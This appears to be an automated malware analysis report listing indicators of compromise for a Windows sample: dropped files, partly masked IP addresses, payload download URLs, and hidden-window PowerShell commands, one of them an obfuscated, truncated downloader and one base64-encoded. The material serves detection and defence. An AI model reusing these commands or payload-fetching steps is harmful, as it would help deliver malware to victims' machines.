Technical Information
- %APPDATA%\2.png
- %APPDATA%\original.exe
- %APPDATA%\original.exe
- '17#.#00.42.180':80
- '45.##3.201.7':80
- http://17#.#00.42.180/2.png
- http://17#.#00.42.180/Original.exe
- http://45.##3.201.7/windows.decoder.manager.form.madrid3_Usdmnyjj.bmp
- '%APPDATA%\original.exe'
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy UnRestricted function kBVwfOZeMIckV($CYqLZw, $LqjXEDyFowweC){[IO.File]::WriteAllBytes($CYqLZw, $LqjXEDyFowweC)};function QFSmSKkQPoBdb($CYqLZw){if($CYqLZw.EndsWith((sbJTndDSTm...' (with hidden window)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQAwAA==' (with hidden window)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQAwAA==